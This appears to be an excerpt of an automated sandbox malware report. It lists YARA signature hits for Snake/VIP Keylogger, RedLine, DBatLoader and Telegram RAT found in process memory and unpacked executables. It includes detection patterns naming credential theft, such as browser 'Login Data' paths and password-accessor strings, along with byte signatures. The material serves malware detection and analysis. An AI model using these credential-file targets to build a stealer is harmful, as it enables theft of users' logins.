0000000D.00000002.3379158943.000000001EE70000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7634a:$a1: get_encryptedPassword 0x7631e:$a2: get_encryptedUsername 0x763e2:$a3: get_timePasswordChanged 0x762fa:$a4: get_passwordField 0x76360:$a5: set_encryptedPassword 0x7612d:$a7: get_logins 0x71902:$a10: KeyLoggerEventArgs 0x718d1:$a11: KeyLoggerEventArgsEventHandler 0x76201:$a13: _encryptedPassword
0000000D.00000002.3382807165.000000001F327000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.3382807165.000000001F327000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2119376344.000000000237F000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000A.00000001.2236001285.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000A.00000002.3387393338.0000000020AB3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3387290898.000000002E061000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 7100	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 7100	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 7100	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 7100	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x193dd:$a1: get_encryptedPassword 0x1690bf:$a1: get_encryptedPassword 0x193295:$a1: get_encryptedPassword 0x1ccb24:$a1: get_encryptedPassword 0x193b1:$a2: get_encryptedUsername 0x169093:$a2: get_encryptedUsername 0x193269:$a2: get_encryptedUsername 0x1ccaf8:$a2: get_encryptedUsername 0x19475:$a3: get_timePasswordChanged 0x169157:$a3: get_timePasswordChanged 0x19332d:$a3: get_timePasswordChanged 0x1ccbbc:$a3: get_timePasswordChanged 0x1938d:$a4: get_passwordField 0x16906f:$a4: get_passwordField 0x193245:$a4: get_passwordField 0x1ccad4:$a4: get_passwordField 0x193f3:$a5: set_encryptedPassword 0x1690d5:$a5: set_encryptedPassword 0x1932ab:$a5: set_encryptedPassword 0x1ccb3a:$a5: set_encryptedPassword 0x191c9:$a7: get_logins
Process Memory Space: fpnevlzQ.pif PID: 1440	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 1440	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 1440	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 1440	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2acb5:$a1: get_encryptedPassword 0x1726b0:$a1: get_encryptedPassword 0x18663c:$a1: get_encryptedPassword 0x201582:$a1: get_encryptedPassword 0x2ac89:$a2: get_encryptedUsername 0x172684:$a2: get_encryptedUsername 0x186610:$a2: get_encryptedUsername 0x201556:$a2: get_encryptedUsername 0x2ad4d:$a3: get_timePasswordChanged 0x172748:$a3: get_timePasswordChanged 0x1866d4:$a3: get_timePasswordChanged 0x20161a:$a3: get_timePasswordChanged 0x2ac65:$a4: get_passwordField 0x172660:$a4: get_passwordField 0x1865ec:$a4: get_passwordField 0x201532:$a4: get_passwordField 0x2accb:$a5: set_encryptedPassword 0x1726c6:$a5: set_encryptedPassword 0x186652:$a5: set_encryptedPassword 0x201598:$a5: set_encryptedPassword 0x2aaa1:$a7: get_logins
Process Memory Space: fpnevlzQ.pif PID: 4536	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 4536	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 4536	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: fpnevlzQ.pif PID: 4536	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x213b4:$a1: get_encryptedPassword 0x71357:$a1: get_encryptedPassword 0x8d218:$a1: get_encryptedPassword 0x231cbc:$a1: get_encryptedPassword 0x21388:$a2: get_encryptedUsername 0x7132b:$a2: get_encryptedUsername 0x8d1ec:$a2: get_encryptedUsername 0x231c90:$a2: get_encryptedUsername 0x2144c:$a3: get_timePasswordChanged 0x713ef:$a3: get_timePasswordChanged 0x8d2b0:$a3: get_timePasswordChanged 0x231d54:$a3: get_timePasswordChanged 0x21364:$a4: get_passwordField 0x71307:$a4: get_passwordField 0x8d1c8:$a4: get_passwordField 0x231c6c:$a4: get_passwordField 0x213ca:$a5: set_encryptedPassword 0x7136d:$a5: set_encryptedPassword 0x8d22e:$a5: set_encryptedPassword 0x231cd2:$a5: set_encryptedPassword 0x211a0:$a7: get_logins
Click to see the 87 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.fpnevlzQ.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.fpnevlzQ.pif.438038.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.fpnevlzQ.pif.4dc8c8.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.1.fpnevlzQ.pif.438038.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.fpnevlzQ.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.PWSW6GK3ZC.exe.237f278.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
10.2.fpnevlzQ.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
9.2.Qzlvenpf.PIF.21108348.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.1eeb11e6.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.1eeb02c6.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
10.2.fpnevlzQ.pif.1f830000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f830000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.1f830000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fpnevlzQ.pif.1f830000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34284:$a1: get_encryptedPassword 0x34258:$a2: get_encryptedUsername 0x3431c:$a3: get_timePasswordChanged 0x34234:$a4: get_passwordField 0x3429a:$a5: set_encryptedPassword 0x34067:$a7: get_logins 0x2f83c:$a10: KeyLoggerEventArgs 0x2f80b:$a11: KeyLoggerEventArgsEventHandler 0x3413b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.1f830000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e4ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3db6d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ddca:$a4: \Orbitum\User Data\Default\Login Data 0x3e7a9:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.1f830000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31e02:$s1: UnHook 0x31d9e:$s2: SetHook 0x31dd7:$s3: CallNextHook 0x31d66:$s4: _hook
7.2.fpnevlzQ.pif.30630f20.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.30630f20.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.30630f20.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.30630f20.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.30630f20.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.30630f20.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
7.2.fpnevlzQ.pif.2de602c6.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.2de602c6.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.2de602c6.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.2de602c6.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34284:$a1: get_encryptedPassword 0x34258:$a2: get_encryptedUsername 0x3431c:$a3: get_timePasswordChanged 0x34234:$a4: get_passwordField 0x3429a:$a5: set_encryptedPassword 0x34067:$a7: get_logins 0x2f83c:$a10: KeyLoggerEventArgs 0x2f80b:$a11: KeyLoggerEventArgsEventHandler 0x3413b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.2de602c6.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e4ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3db6d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ddca:$a4: \Orbitum\User Data\Default\Login Data 0x3e7a9:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.2de602c6.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31e02:$s1: UnHook 0x31d9e:$s2: SetHook 0x31dd7:$s3: CallNextHook 0x31d66:$s4: _hook
10.2.fpnevlzQ.pif.1f5411e6.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f5411e6.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.1f5411e6.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.fpnevlzQ.pif.2c39f308.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.fpnevlzQ.pif.2c39f308.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.3.fpnevlzQ.pif.2c39f308.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fpnevlzQ.pif.1f5411e6.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
7.3.fpnevlzQ.pif.2c39f308.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.1f5411e6.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
7.3.fpnevlzQ.pif.2c39f308.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.1f5411e6.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
7.3.fpnevlzQ.pif.2c39f308.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.1.fpnevlzQ.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.1f5402c6.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
13.2.fpnevlzQ.pif.21740000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.21740000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.21740000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.21740000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34284:$a1: get_encryptedPassword 0x34258:$a2: get_encryptedUsername 0x3431c:$a3: get_timePasswordChanged 0x34234:$a4: get_passwordField 0x3429a:$a5: set_encryptedPassword 0x34067:$a7: get_logins 0x2f83c:$a10: KeyLoggerEventArgs 0x2f80b:$a11: KeyLoggerEventArgsEventHandler 0x3413b:$a13: _encryptedPassword
